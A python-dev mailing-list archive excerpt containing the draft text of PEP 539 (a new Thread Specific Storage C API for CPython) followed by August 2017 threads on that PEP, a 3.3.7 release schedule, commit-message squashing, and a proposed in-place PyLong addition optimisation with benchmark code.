Draft Type: Informational Content-Type: text/x-rst Created: 20-Dec-2016 Post-History: 16-Dec-2016 Abstract ======== The proposal is to add a new Thread Local Storage (TLS) API to CPython which would supersede use of the existing TLS API within the CPython interpreter, while deprecating the existing API. The new API is named "Thread Specific Storage (TSS) API" (see `Rationale for Proposed Solution`_ for the origin of the name). Because the existing TLS API is only used internally (it is not mentioned in the documentation, and the header that defines it, ``pythread.h``, is not included in ``Python.h`` either directly or indirectly), this proposal probably only affects CPython, but might also affect other interpreter implementations (PyPy?) that implement parts of the CPython API. This is motivated primarily by the fact that the old API uses ``int`` to represent TLS keys across all platforms, which is neither POSIX-compliant, nor portable in any practical sense [1]_. .. note:: Throughout this document the acronym "TLS" refers to Thread Local Storage and should not be confused with "Transportation Layer Security" protocols. Specification ============= The current API for TLS used inside the CPython interpreter consists of 6 functions:: PyAPI_FUNC(int) PyThread_create_key(void) PyAPI_FUNC(void) PyThread_delete_key(int key) PyAPI_FUNC(int) PyThread_set_key_value(int key, void *value) PyAPI_FUNC(void *) PyThread_get_key_value(int key) PyAPI_FUNC(void) PyThread_delete_key_value(int key) PyAPI_FUNC(void) PyThread_ReInitTLS(void) These would be superseded by a new set of analogous functions:: PyAPI_FUNC(int) PyThread_tss_create(Py_tss_t *key) PyAPI_FUNC(void) PyThread_tss_delete(Py_tss_t *key) PyAPI_FUNC(int) PyThread_tss_set(Py_tss_t *key, void *value) PyAPI_FUNC(void *) PyThread_tss_get(Py_tss_t *key) The specification also adds a few new features: * A new type ``Py_tss_t``--an opaque type the definition of which may depend on the underlying TLS implementation. It is defined:: typedef struct { bool _is_initialized; NATIVE_TSS_KEY_T _key; } Py_tss_t; where ``NATIVE_TSS_KEY_T`` is a macro whose value depends on the underlying native TLS implementation (e.g. ``pthread_key_t``). * A constant default value for ``Py_tss_t`` variables, ``Py_tss_NEEDS_INIT``. * Three new functions:: PyAPI_FUNC(Py_tss_t *) PyThread_tss_alloc(void) PyAPI_FUNC(void) PyThread_tss_free(Py_tss_t *key) PyAPI_FUNC(bool) PyThread_tss_is_created(Py_tss_t *key) The first two are needed for dynamic (de-)allocation of a ``Py_tss_t``, particularly in extension modules built with ``Py_LIMITED_API``, where static allocation of this type is not possible due to its implementation being opaque at build time. A value returned by ``PyThread_tss_alloc`` is the same state as initialized by ``Py_tss_NEEDS_INIT``, or ``NULL`` for dynamic allocation failure. The behavior of ``PyThread_tss_free`` involves calling ``PyThread_tss_delete`` preventively, or is no-op if the value pointed to by the ``key`` argument is ``NULL``. ``PyThread_tss_is_created`` returns ``true`` if the given ``Py_tss_t`` has been initialized (i.e. by ``PyThread_tss_create``). The new TSS API does not provide functions which correspond to ``PyThread_delete_key_value`` and ``PyThread_ReInitTLS``, because these functions are for the removed CPython's own TLS implementation, that is the existing API behavior has become as follows: ``PyThread_delete_key_value(key)`` is equal to ``PyThread_set_key_value(key, NULL)``, and ``PyThread_ReInitTLS()`` is no-op [8]_. The new ``PyThread_tss_`` functions are almost exactly analogous to their original counterparts with a few minor differences: Whereas ``PyThread_create_key`` takes no arguments and returns a TLS key as an ``int``, ``PyThread_tss_create`` takes a ``Py_tss_t*`` as an argument and returns an ``int`` status code. The behavior of ``PyThread_tss_create`` is undefined if the value pointed to by the ``key`` argument is not initialized by ``Py_tss_NEEDS_INIT``. The returned status code is zero on success and non-zero on failure. The meanings of non-zero status codes are not otherwise defined by this specification. Similarly the other ``PyThread_tss_`` functions are passed a ``Py_tss_t*`` whereas previously the key was passed by value. This change is necessary, as being an opaque type, the ``Py_tss_t`` type could hypothetically be almost any size. This is especially necessary for extension modules built with ``Py_LIMITED_API``, where the size of the type is not known. Except for ``PyThread_tss_free``, the behaviors of ``PyThread_tss_`` are undefined if the value pointed to by the ``key`` argument is ``NULL``. Moreover, because of the use of ``Py_tss_t`` instead of ``int``, there are additional behaviors which the existing API design would be carried over into new API: The TSS key creation and deletion are parts of "do-if-needed" flow and these features are silently skipped if already done--Calling ``PyThread_tss_create`` with an initialized key does nothing and returns success soon. This is also the case of calling ``PyThread_tss_delete`` with an uninitialized key. The behavior of ``PyThread_tss_delete`` is defined to change the key's initialization state to "uninitialized" in order to restart the CPython interpreter without terminating the process (e.g. embedding Python in an application) [12]_. The old ``PyThread_*_key*`` functions will be marked as deprecated in the documentation, but will not generate runtime deprecation warnings. Additionally, on platforms where ``sizeof(pthread_key_t) != sizeof(int)``, ``PyThread_create_key`` will return immediately with a failure status, and the other TLS functions will all be no-ops on such platforms. Comparison of API Specification ------------------------------- ================= ============================= ============================= API Thread Local Storage (TLS) Thread Specific Storage (TSS) ================= ============================= ============================= Version Existing New Key Type ``int`` ``Py_tss_t`` (opaque type) Handle Native Key cast to ``int`` conceal into internal field Function Argument ``int`` ``Py_tss_t *`` Features - create key - create key - delete key - delete key - set value - set value - get value - get value - delete value - (set ``NULL`` instead) [8]_ - reinitialize keys (for - (unnecessary) [8]_ after fork) - dynamically (de-)allocate key - check key's initialization state Default Value (``-1`` as key creation ``Py_tss_NEEDS_INIT`` failure) Requirement native thread native thread (since CPython 3.7 [9]_) Restriction Not support platform where Unable to statically allocate native TLS key is defined in key when ``Py_LIMITED_API`` a way that cannot be safely is defined. cast to ``int``. ================= ============================= ============================= Example ------- With the proposed changes, a TSS key is initialized like:: static Py_tss_t tss_key = Py_tss_NEEDS_INIT; if (PyThread_tss_create(&tss_key)) { /* ... handle key creation failure ... */ } The initialization state of the key can then be checked like:: assert(PyThread_tss_is_created(&tss_key)); The rest of the API is used analogously to the old API:: int the_value = 1; if (PyThread_tss_get(&tss_key) == NULL) { PyThread_tss_set(&tss_key, (void *)&the_value); assert(PyThread_tss_get(&tss_key) != NULL); } /* ... once done with the key ... */ PyThread_tss_delete(&tss_key); assert(!PyThread_tss_is_created(&tss_key)); When ``Py_LIMITED_API`` is defined, a TSS key must be dynamically allocated:: static Py_tss_t *ptr_key = PyThread_tss_alloc(); if (ptr_key == NULL) { /* ... handle key allocation failure ... */ } assert(!PyThread_tss_is_created(ptr_key)); /* ... once done with the key ... */ PyThread_tss_free(ptr_key); ptr_key = NULL; Platform Support Changes ======================== A new "Native Thread Implementation" section will be added to PEP 11 that states: * As of CPython 3.7, in the case of enabling thread support, all platforms are required to provide at least one of native thread implementation (as of pthreads or Windows) to implement TSS API. Any TSS API problems that occur in the implementation without native thread will be closed as "won't fix". Motivation ========== The primary problem at issue here is the type of the keys (``int``) used for TLS values, as defined by the original PyThread TLS API. The original TLS API was added to Python by GvR back in 1997, and at the time the key used to represent a TLS value was an ``int``, and so it has been to the time of writing. This used CPython's own TLS implementation, but the current generation of which hasn't been used, largely unchanged, in Python/thread.c. Support for implementation of the API on top of native thread implementations (pthreads and Windows) was added much later, and the own implementation has been no longer necessary and removed [9]_. The problem with the choice of ``int`` to represent a TLS key, is that while it was fine for CPython's own TLS implementation, and happens to be compatible with Windows (which uses ``DWORD`` for the analogous data), it is not compatible with the POSIX standard for the pthreads API, which defines ``pthread_key_t`` as an opaque type not further defined by the standard (as with ``Py_tss_t`` described above) [14]_. This leaves it up to the underlying implementation how a ``pthread_key_t`` value is used to look up thread-specific data. This has not generally been a problem for Python's API, as it just happens that on Linux ``pthread_key_t`` is defined as an ``unsigned int``, and so is fully compatible with Python's TLS API--``pthread_key_t``'s created by ``pthread_create_key`` can be freely cast to ``int`` and back (well, not exactly, even this has some limitations as pointed out by issue #22206). However, as issue #25658 points out, there are at least some platforms (namely Cygwin, CloudABI, but likely others as well) which have otherwise modern and POSIX-compliant pthreads implementations, but are not compatible with Python's API because their ``pthread_key_t`` is defined in a way that cannot be safely cast to ``int``. In fact, the possibility of running into this problem was raised by MvL at the time pthreads TLS was added [2]_. It could be argued that PEP-11 makes specific requirements for supporting a new, not otherwise officially-support platform (such as CloudABI), and that the status of Cygwin support is currently dubious. However, this creates a very high barrier to supporting platforms that are otherwise Linux- and/or POSIX-compatible and where CPython might otherwise "just work" except for this one hurdle. CPython itself imposes this implementation barrier by way of an API that is not compatible with POSIX (and in fact makes invalid assumptions about pthreads). Rationale for Proposed Solution =============================== The use of an opaque type (``Py_tss_t``) to key TLS values allows the API to be compatible, with all present (POSIX and Windows) and future (C11?) native TLS implementations supported by CPython, as it allows the definition of ``Py_tss_t`` to depend on the underlying implementation. Since the existing TLS API has been available in *the limited API* [13]_ for some platforms (e.g. Linux), CPython makes an effort to provide the new TSS API at that level likewise. Note, however, that ``Py_tss_t`` definition becomes to be an opaque struct when ``Py_LIMITED_API`` is defined, because exposing ``NATIVE_TSS_KEY_T`` as part of the limited API would prevent us from switching native thread implementation without rebuilding extension module. A new API must be introduced, rather than changing the function signatures of the current API, in order to maintain backwards compatibility. The new API also more clearly groups together these related functions under a single name prefix, ``PyThread_tss_``. The "tss" in the name stands for "thread-specific storage", and was influenced by the naming and design of the "tss" API that is part of the C11 threads API [15]_. However, this is in no way meant to imply compatibility with or support for the C11 threads API, or signal any future intention of supporting C11--it's just the influence for the naming and design. The inclusion of the special default value ``Py_tss_NEEDS_INIT`` is required by the fact that not all native TLS implementations define a sentinel value for uninitialized TLS keys. For example, on Windows a TLS key is represented by a ``DWORD`` (``unsigned int``) and its value must be treated as opaque [3]_. So there is no unsigned integer value that can be safely used to represent an uninitialized TLS key on Windows. Likewise, POSIX does not specify a sentinel for an uninitialized ``pthread_key_t``, instead relying on the ``pthread_once`` interface to ensure that a given TLS key is initialized only once per-process. Therefore, the ``Py_tss_t`` type contains an explicit ``._is_initialized`` that can indicate the key's initialization state independent of the underlying implementation. Changing ``PyThread_create_key`` to immediately return a failure status on systems using pthreads where ``sizeof(int) != sizeof(pthread_key_t)`` is intended as a sanity check: Currently, ``PyThread_create_key`` may report initial success on such systems, but attempts to use the returned key are likely to fail. Although in practice this failure occurs earlier in the interpreter initialization, it's better to fail immediately at the source of problem (``PyThread_create_key``) rather than sometime later when use of an invalid key is attempted. In other words, this indicates clearly that the old API is not supported on platforms where it cannot be used reliably, and that no effort will be made to add such support. Rejected Ideas ============== * Do nothing: The status quo is fine because it works on Linux, and platforms wishing to be supported by CPython should follow the requirements of PEP-11. As explained above, while this would be a fair argument if CPython were being to asked to make changes to support particular quirks or features of a specific platform, in this case it is quirk of CPython that prevents it from being used to its full potential on otherwise POSIX-compliant platforms. The fact that the current implementation happens to work on Linux is a happy accident, and there's no guarantee that this will never change. * Affected platforms should just configure Python ``--without-threads``: This is a possible temporary workaround to the issue, but only that. Python should not be hobbled on affected platforms despite them being otherwise perfectly capable of running multi-threaded Python. * Affected platforms should use CPython's own TLS implementation instead of native TLS implementation: This is a more acceptable alternative to the previous idea, and in fact there had been a patch to do just that [4]_. However, the own implementation being "slower and clunkier" in general than native implementations still needlessly hobbles performance on affected platforms. At least one other module (``tracemalloc``) is also broken if Python is built without native implementation. And this idea cannot be adopted because the own implementation was removed. * Keep the existing API, but work around the issue by providing a mapping from ``pthread_key_t`` values to ``int`` values. A couple attempts were made at this ([5]_, [6]_), but this only injects needless complexity and overhead into performance-critical code on platforms that are not currently affected by this issue (such as Linux). Even if use of this workaround were made conditional on platform compatibility, it introduces platform-specific code to maintain, and still has the problem of the previous rejected ideas of needlessly hobbling performance on affected platforms. Implementation ============== An initial version of a patch [7]_ is available on the bug tracker for this issue. Since the migration to Github, it's being developed in the ``pep539-tss-api`` feature branch [10]_ in Masayuki Yamamoto's fork of the CPython repository on Github. A work-in-progress PR is available at [11]_. This reference implementation covers not only the enhancement request in API features, but also the client codes fix needed to replace the existing TLS API with the new TSS API. Copyright ========= This document has been placed in the public domain. References and Footnotes ======================== .. [1] http://bugs.python.org/issue25658 .. [2] https://bugs.python.org/msg116292 .. [3] https://msdn.microsoft.com/en-us/library/windows/desktop/ms686801(v=vs.85).aspx .. [4] http://bugs.python.org/file45548/configure-pthread_key_t.patch .. [5] http://bugs.python.org/file44269/issue25658-1.patch .. [6] http://bugs.python.org/file44303/key-constant-time.diff .. [7] http://bugs.python.org/file46379/pythread-tss-3.patch .. [8] https://bugs.python.org/msg298342 .. [9] http://bugs.python.org/issue30832 .. [10] https://github.com/python/cpython/compare/master...ma8ma:pep539-tss-api .. [11] https://github.com/python/cpython/pull/1362 .. [12] https://docs.python.org/3/c-api/init.html#c.Py_FinalizeEx .. [13] It is also called as "stable ABI" (https://www.python.org/dev/peps/pep-0384/) .. [14] http://pubs.opengroup.org/onlinepubs/009695399/functions/pthread_key_create.html .. [15] http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1570.pdf#page=404 -------------- next part -------------- An HTML attachment was scrubbed... URL: From victor.stinner at gmail.com Thu Aug 31 04:22:37 2017 From: victor.stinner at gmail.com (Victor Stinner) Date: Thu, 31 Aug 2017 10:22:37 +0200 Subject: [Python-Dev] [python-committers] Python 3.3.7 release schedule and end-of-life In-Reply-To: <32CB89BE-A49E-4888-B8C7-4A8CAB8F15F1@python.org> References: <32CB89BE-A49E-4888-B8C7-4A8CAB8F15F1@python.org> Message-ID: Hello, 2017-07-15 23:51 GMT+02:00 Ned Deily : > To that end, I would like to schedule its next, and hopefully final, security-fix release to coincide with the already announced 3.4.7 security-fix release. In particular, we'll plan to tag and release 3.3.7rc1 on Monday 2017-07-24 (UTC) and tag and release 3.3.7 final on Monday 2017-08-07. In the coming days, I'll be reviewing the outstanding 3.3 security issues and merging appropriate 3.3 PRs. Some of them have been sitting as patches for a long time so, if you have any such security issues that you think belong in 3.3, it would be very helpful if you would review such patches and turn them into 3.3 PRs. Any update on the 3.3.7 release? 3.3.7rc1 wasn't released yet, no? By the way, it seems like a recent update of libexpat caused a regression :-( https://bugs.python.org/issue31170 I didn't have time to look on that issue yet. Victor From ncoghlan at gmail.com Thu Aug 31 05:51:37 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Thu, 31 Aug 2017 19:51:37 +1000 Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython In-Reply-To: References: Message-ID: On 31 August 2017 at 18:16, Masayuki YAMAMOTO wrote: > Hi python-dev, > > Since Erik started the PEP 539 thread on python-ideas, I've collected > feedbacks in the discussion and pull-request, and tried improvement for the > API specification and reference implementation, as the result I think > resolved issues which pointed out by feedbacks. > > Well, it's probably not finish yet, there is one which bothers me. I'm not > sure the CPython startup sequence design (PEP 432 Restructuring the CPython > startup sequence, it might be a conflict with the draft specification [1]), I think that's just a bug in the startup refactoring - we don't currently test the "Py_Initialize()/Py_Initialize()/Py_Finalize()" sequence anywhere, and I'd missed that it's explicitly documented as being permitted. I'd still want to keep the "multiple calls without an intervening finalize are prohibited" behaviour for the new more granular APIs (since it's simpler and easier to explain if it just always fails rather than attempting to check that the previous initialization supplied the same config settings), but the documented Py_Initialize() behaviour can be reinstated by restoring the early return in _Py_InitializeEx_Private. It's also worth noting that we *do* test repeated Py_Initialize()/Py_Finalize() cycles - Py_Finalize() explicitly clears the internal flags that would otherwise lead to a fatal error in _Py_InitializeCore. As far as the PEP itself goes, this version looks good to me, so if there aren't any other significant comments between now and then, I'm likely to accept it at the core development sprint next week. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From erik.m.bray at gmail.com Thu Aug 31 06:40:36 2017 From: erik.m.bray at gmail.com (Erik Bray) Date: Thu, 31 Aug 2017 12:40:36 +0200 Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython In-Reply-To: References: Message-ID: On Thu, Aug 31, 2017 at 10:16 AM, Masayuki YAMAMOTO wrote: > Hi python-dev, > > Since Erik started the PEP 539 thread on python-ideas, I've collected > feedbacks in the discussion and pull-request, and tried improvement for the > API specification and reference implementation, as the result I think > resolved issues which pointed out by feedbacks. Thanks Masayuki for taking the lead on updating the PEP. I've been off the ball with it for a while. In particular the table summarizing the changes is nice. I just have a few minor changes to suggest (typos and such) that I'll make in a pull request. From ma3yuki.8mamo10 at gmail.com Thu Aug 31 09:39:40 2017 From: ma3yuki.8mamo10 at gmail.com (Masayuki YAMAMOTO) Date: Thu, 31 Aug 2017 22:39:40 +0900 Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython In-Reply-To: References: Message-ID: 2017-08-31 18:51 GMT+09:00 Nick Coghlan : > [...] > I think that's just a bug in the startup refactoring - we don't > currently test the "Py_Initialize()/Py_Initialize()/Py_Finalize()" > sequence anywhere, and I'd missed that it's explicitly documented as > being permitted. I'd still want to keep the "multiple calls without an > intervening finalize are prohibited" behaviour for the new more > granular APIs (since it's simpler and easier to explain if it just > always fails rather than attempting to check that the previous > initialization supplied the same config settings), but the documented > Py_Initialize() behaviour can be reinstated by restoring the early > return in _Py_InitializeEx_Private. > I get the point of difference between document and current code, I don't mind :) As far as the PEP itself goes, this version looks good to me, so if > there aren't any other significant comments between now and then, I'm > likely to accept it at the core development sprint next week. > I took time, but I'm happy to near to finish. Thanks you for helping! Masayuki -------------- next part -------------- An HTML attachment was scrubbed... URL: From ma3yuki.8mamo10 at gmail.com Thu Aug 31 10:05:21 2017 From: ma3yuki.8mamo10 at gmail.com (Masayuki YAMAMOTO) Date: Thu, 31 Aug 2017 23:05:21 +0900 Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython In-Reply-To: References: Message-ID: Because I couldn't go to there by myself, I'm really grateful to you and your first draft. Masayuki 2017-08-31 19:40 GMT+09:00 Erik Bray : > On Thu, Aug 31, 2017 at 10:16 AM, Masayuki YAMAMOTO > wrote: > > Hi python-dev, > > > > Since Erik started the PEP 539 thread on python-ideas, I've collected > > feedbacks in the discussion and pull-request, and tried improvement for > the > > API specification and reference implementation, as the result I think > > resolved issues which pointed out by feedbacks. > > Thanks Masayuki for taking the lead on updating the PEP. I've been > off the ball with it for a while. In particular the table summarizing > the changes is nice. I just have a few minor changes to suggest > (typos and such) that I'll make in a pull request. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From k7hoven at gmail.com Thu Aug 31 10:13:08 2017 From: k7hoven at gmail.com (Koos Zevenhoven) Date: Thu, 31 Aug 2017 17:13:08 +0300 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On Wed, Aug 30, 2017 at 5:36 PM, Yury Selivanov wrote: > On Wed, Aug 30, 2017 at 9:44 AM, Yury Selivanov > wrote: > [..] > >> FYI, I've been sketching an alternative solution that addresses these > kinds > >> of things. I've been hesitant to post about it, partly because of the > >> PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been > >> describing, and partly because that might be a major distraction from > other > >> useful discussions, especially because I wasn't completely sure yet > about > >> whether my approach has some fatal flaw compared to PEP 550 ;). > > > > We'll never know until you post it. Go ahead. > > Anyway, thanks to these efforts, your proposal has become somewhat more competitive compared to mine ;). I'll post mine as soon as I find the time to write everything down. My intention is before next week. ?Koos -- + Koos Zevenhoven + http://twitter.com/k7hoven + -------------- next part -------------- An HTML attachment was scrubbed... URL: From catalin.gabriel.manciu at intel.com Thu Aug 31 14:40:07 2017 From: catalin.gabriel.manciu at intel.com (Manciu, Catalin Gabriel) Date: Thu, 31 Aug 2017 18:40:07 +0000 Subject: [Python-Dev] Inplace operations for PyLong objects Message-ID: Hi everyone, While looking over the PyLong source code in Objects/longobject.c I came across the fact that the PyLong object doesnt't include implementation for basic inplace operations such as adding or multiplication: [...] long_long, /*nb_int*/ 0, /*nb_reserved*/ long_float, /*nb_float*/ 0, /* nb_inplace_add */ 0, /* nb_inplace_subtract */ 0, /* nb_inplace_multiply */ 0, /* nb_inplace_remainder */ [...] While I understand that the immutable nature of this type of object justifies this approach, I wanted to experiment and see how much performance an inplace add would bring. My inplace add will revert to calling the default long_add function when: - the refcount of the first operand indicates that it's being shared or - that operand is one of the preallocated 'small ints' which should mitigate the effects of not conforming to the PyLong immutability specification. It also allocates a new PyLong _only_ in case of a potential overflow. The workload I used to evaluate this is a simple script that does a lot of inplace adding: import time import sys def write_progress(prev_percentage, value, limit): percentage = (100 * value) // limit if percentage != prev_percentage: sys.stdout.write("%d%%\r" % (percentage)) sys.stdout.flush() return percentage progress = -1 the_value = 0 the_increment = ((1 << 30) - 1) crt_iter = 0 total_iters = 10 ** 9 start = time.time() while crt_iter < total_iters: the_value += the_increment crt_iter += 1 progress = write_progress(progress, crt_iter, total_iters) end = time.time() print ("\n%.3fs" % (end - start)) print ("the_value: %d" % (the_value)) Running the baseline version outputs: ./python inplace.py 100% 356.633s the_value: 1073741823000000000 Running the modified version outputs: ./python inplace.py 100% 308.606s the_value: 1073741823000000000 In summary, I got a +13.47% improvement for the modified version. The CPython revision I'm using is 7f066844a79ea201a28b9555baf4bceded90484f from the master branch and I'm running on a I7 6700K CPU with Turbo-Boost disabled (frequency is pinned at 4GHz). Do you think that such an optimization would be a good approach ? Thank you, Catalin From brett at python.org Thu Aug 31 15:27:40 2017 From: brett at python.org (Brett Cannon) Date: Thu, 31 Aug 2017 19:27:40 +0000 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol> Message-ID: On Wed, 30 Aug 2017 at 02:56 Paul Moore wrote: > On 30 August 2017 at 10:48, Nick Coghlan wrote: > > On 30 August 2017 at 19:39, Antoine Pitrou wrote: > >> On Wed, 30 Aug 2017 08:48:56 +0300 > >> Serhiy Storchaka wrote: > >>> Please, please don't forget to edit commit messages before merging. An > >>> excessively verbose commit message will be kept in the repository > >>> forever and will harm future developers that read a history. > >> > >> Sorry, I routinely forget about it. Can we have an automated check for > >> this? > > > > Not while we're pushing the "squash & merge" button directly, as > > there's no opportunity for any automated hooks to run at that point :( > > > > More options open up if the actual commit is being handled by a bot, > > but even that would still depend on us providing an updated commit > > message via some mechanism. > > We could have a check for PRs that contain multiple commits. The check > would flag that the commit message needs manual editing before > merging, and would act as a prompt for submitters who are willing to > do so to squash their PRs themselves. Personally, I'd prefer that as, > apart from admin activities like making sure the PR and issue number > references are present and correct, I think the original submitter has > a better chance of properly summarising the PR in the merged commit > message anyway. > So you would want a comment when the PR reaches "awaiting merge" with instructions requesting the author do their own squash commit to simplify the message for us? There's also https://github.com/python/bedevere/issues/14 to help post-commit remind core devs when they forgot to do something. While it would be too late to fix a problem, hopefully regular reminders would still be helpful. -------------- next part -------------- An HTML attachment was scrubbed... URL: From p.f.moore at gmail.com Thu Aug 31 16:50:44 2017 From: p.f.moore at gmail.com (Paul Moore) Date: Thu, 31 Aug 2017 21:50:44 +0100 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol> Message-ID: On 31 August 2017 at 20:27, Brett Cannon wrote: > So you would want a comment when the PR reaches "awaiting merge" with > instructions requesting the author do their own squash commit to simplify > the message for us? That would work. It could say that the PR consists of multiple commits and the commit message needs to be summarised when merging, and suggest that if the submitter is willing, they could squash and summarise the message themselves. I don't want to give the impression we're insisting the submitter squash, rather we're pointing out there's an additional step needed and the submitter can help by doing that step if they wish. > There's also https://github.com/python/bedevere/issues/14 to help > post-commit remind core devs when they forgot to do something. While it > would be too late to fix a problem, hopefully regular reminders would still > be helpful. Yeah, that would probably be useful for regular committers. Paul From tjreedy at udel.edu Thu Aug 31 17:24:50 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Thu, 31 Aug 2017 17:24:50 -0400 Subject: [Python-Dev] Inplace operations for PyLong objects In-Reply-To: References: Message-ID: On 8/31/2017 2:40 PM, Manciu, Catalin Gabriel wrote: > Hi everyone, > > While looking over the PyLong source code in Objects/longobject.c I came > across the fact that the PyLong object doesnt't include implementation for > basic inplace operations such as adding or multiplication: > > [...] > long_long, /*nb_int*/ > 0, /*nb_reserved*/ > long_float, /*nb_float*/ > 0, /* nb_inplace_add */ > 0, /* nb_inplace_subtract */ > 0, /* nb_inplace_multiply */ > 0, /* nb_inplace_remainder */ > [...] > > While I understand that the immutable nature of this type of object justifies > this approach, I wanted to experiment and see how much performance an inplace > add would bring. > My inplace add will revert to calling the default long_add function when: > - the refcount of the first operand indicates that it's being shared > or > - that operand is one of the preallocated 'small ints' > which should mitigate the effects of not conforming to the PyLong immutability > specification. > It also allocates a new PyLong _only_ in case of a potential overflow. > > The workload I used to evaluate this is a simple script that does a lot of > inplace adding: > > import time > import sys > > def write_progress(prev_percentage, value, limit): > percentage = (100 * value) // limit > if percentage != prev_percentage: > sys.stdout.write("%d%%\r" % (percentage)) > sys.stdout.flush() > return percentage > > progress = -1 > the_value = 0 > the_increment = ((1 << 30) - 1) > crt_iter = 0 > total_iters = 10 ** 9 > > start = time.time() > > while crt_iter < total_iters: > the_value += the_increment > crt_iter += 1 > > progress = write_progress(progress, crt_iter, total_iters) > end = time.time() > > print ("\n%.3fs" % (end - start)) > print ("the_value: %d" % (the_value)) > > Running the baseline version outputs: > ./python inplace.py > 100% > 356.633s > the_value: 1073741823000000000 > > Running the modified version outputs: > ./python inplace.py > 100% > 308.606s > the_value: 1073741823000000000 > > In summary, I got a +13.47% improvement for the modified version. > The CPython revision I'm using is 7f066844a79ea201a28b9555baf4bceded90484f > from the master branch and I'm running on a I7 6700K CPU with Turbo-Boost > disabled (frequency is pinned at 4GHz). > > Do you think that such an optimization would be a good approach ? On my machine, the more realistic code, with an implicit C loop, the_value = sum(the_increment for i in range(total_iters)) gives the same value twice as fast as your explicit Python loop. (I cut total_iters down to 10**7). You might check whether sum uses an in-place accumulator for ints. -- Terry Jan Reedy From tjreedy at udel.edu Thu Aug 31 17:46:55 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Thu, 31 Aug 2017 17:46:55 -0400 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol> Message-ID: On 8/31/2017 3:27 PM, Brett Cannon wrote: > > > On Wed, 30 Aug 2017 at 02:56 Paul Moore do so to squash their PRs themselves. Personally, I'd prefer that as, > apart from admin activities like making sure the PR and issue number > references are present and correct, I think the original submitter has > a better chance of properly summarising the PR in the merged commit > message anyway. My experience is different. > So you would want a comment when the PR reaches "awaiting merge" with > instructions requesting the author do their own squash commit to My impression is that this makes the individual commits disappear. > simplify the message for us? Not me. -- Terry Jan Reedy From catalin.gabriel.manciu at intel.com Thu Aug 31 19:35:34 2017 From: catalin.gabriel.manciu at intel.com (Manciu, Catalin Gabriel) Date: Thu, 31 Aug 2017 23:35:34 +0000 Subject: [Python-Dev] Inplace operations for PyLong objects In-Reply-To: References: Message-ID: >On my machine, the more realistic code, with an implicit C loop, >the_value = sum(the_increment for i in range(total_iters)) >gives the same value twice as fast as your explicit Python loop. >(I cut total_iters down to 10**7). Your code is faster due to a number of reasons: - range in Python 3 is implemented in C so it's quite faster and, because your range only goes up to 10 ** 7, the fastest iterator is used: rangeiterobject for which the 'next' function is implemented using native longs instead of CPython PyLongs: rangeiter_next(rangeiterobject *r) from rangeobject.c - my code also does some extra work to output a progress indicator >You might check whether sum uses an in-place accumulator for ints. - you're right, sum actually works with native longs until it overflows or you stop adding PyLongs, then it falls back to PyNumber_Add, check: static PyObject * builtin_sum_impl(PyObject *module, PyObject *iterable, PyObject *start) from bltinmodule.c The focus of this experiment was inplace adds in general. While, as you've shown, there are ways to write the loop optimally, the benchmark was written as a huge loop just to showcase that there is an improvement using this approach. The performance improvement is a result of not having to allocate/deallocate a PyLong per iteration. A huge Python program with lots of PyLong inplace operations (not just adds, this can be applied to all PyLong inplace operations), regardless of them being in a loop or not, might benefit from such an optimization. Thank you, Catalin From rosuav at gmail.com Thu Aug 31 19:43:52 2017 From: rosuav at gmail.com (Chris Angelico) Date: Fri, 1 Sep 2017 09:43:52 +1000 Subject: [Python-Dev] Inplace operations for PyLong objects In-Reply-To: References: Message-ID: On Fri, Sep 1, 2017 at 9:35 AM, Manciu, Catalin Gabriel wrote: > A huge Python program with lots of PyLong inplace operations (not just > adds, this can be applied to all PyLong inplace operations), regardless of them > being in a loop or not, might benefit from such an optimization. If you're writing a lot of numerical work in Python, have you tried running your code in PyPy? At very least, it's worth adding as another data point in your performance comparisons. ChrisA From solipsis at pitrou.net Thu Aug 31 20:12:59 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Fri, 1 Sep 2017 02:12:59 +0200 Subject: [Python-Dev] Inplace operations for PyLong objects References: Message-ID: <20170901021259.0bb7d002@fsol> On Thu, 31 Aug 2017 23:35:34 +0000 "Manciu, Catalin Gabriel" wrote: > > The focus of this experiment was inplace adds in general. While, as you've > shown, there are ways to write the loop optimally, the benchmark was written > as a huge loop just to showcase that there is an improvement using this > approach. The performance improvement is a result of not having to > allocate/deallocate a PyLong per iteration. > > A huge Python program with lots of PyLong inplace operations (not just > adds, this can be applied to all PyLong inplace operations), regardless of them > being in a loop or not, might benefit from such an optimization. I'm skeptical there are some programs out there that are limited by the speed of PyLong inplace additions. Even if you have a bigint-intensive workload (say public-key cryptography, not that it's specifically a good idea to do so in pure Python), chances are it's spending much of its time in more sophisticated operations such as multiplication, power or division. In other words, while your experiment has intellectual and educational interest, I don't think it shows the path to a useful optimization. Regards Antoine.